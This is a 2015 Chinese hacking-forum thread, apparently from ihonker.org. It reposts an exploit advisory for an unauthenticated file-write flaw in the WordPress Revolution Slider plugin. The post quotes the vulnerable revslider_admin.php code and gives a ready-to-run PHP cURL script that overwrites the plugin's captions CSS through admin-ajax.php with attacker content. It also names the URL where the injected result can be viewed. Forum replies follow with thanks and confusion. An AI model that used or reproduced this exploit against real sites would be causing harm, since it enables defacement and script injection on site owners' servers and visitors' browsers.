90_ 发表于 2015-3-29 18:07:24

Wordpress Revolution Slider插件任意上传漏洞

######################################################################
# Exploit Title: Wordpress Plugin Revolution Slider - Unrestricted File Upload
# Google Dork: Y0ur Brain
# Date: 27.03.2015
# Exploit Author: CrashBandicot (@DosPerl)
# Vendor HomePage: http://revolution.themepunch.com/
# Version: old
# Tested on: Windows
######################################################################

# Path of File : /wp-content/plugins/revslider/revslider_admin.php
# Vulnerable File : revslider_admin.php
 
232.    $action = self::getPostGetVar("client_action");
233.    $data = self::getPostGetVar("data");
...
301.    case "get_captions_css":
302.     $contentCSS = $operations->getCaptionsContent();
303.      self::ajaxResponseData($contentCSS);
...
305.    case "update_captions_css":
306.      $arrCaptions = $operations->updateCaptionsContentData($data);
307.      self::ajaxResponseSuccess("CSS file saved succesfully!",array("arrCaptions"=>$arrCaptions));
 
 
# Exploit :
 
<?php
 
$post = array
(
"action" => "revslider_ajax_action",
"client_action" => "update_captions_css",
"data" => "<marquee>Malicious Code Here</marquee>"
);
  
$ch = curl_init ("http://localhost/wp-admin/admin-ajax.php");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
 
?>
 
 
# Path of Result : /wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
 

浮尘 发表于 2015-3-29 19:13:42

看不懂这个东西

Tesla 发表于 2015-3-29 22:52:32

老大老是整这些高端的东西,我们很看不懂啊,要不出个公开课吧:funk:

_vae 发表于 2015-3-30 17:38:00

感谢分享

testtz 发表于 2015-3-31 09:01:32

这个漏洞国外的比较多

jinshengjinshi 发表于 2015-3-31 22:06:00

还得继续学习啊                     

cl476874045 发表于 2015-6-27 22:33:59

支持中国红客联盟(ihonker.org)

borall 发表于 2015-6-29 01:58:18

还是不错的哦,顶了

Lucifer 发表于 2015-6-29 04:23:34

支持中国红客联盟(ihonker.org)

wtsqq123 发表于 2015-6-29 21:20:30

页: [1] 2 3 4 5 6
查看完整版本: Wordpress Revolution Slider插件任意上传漏洞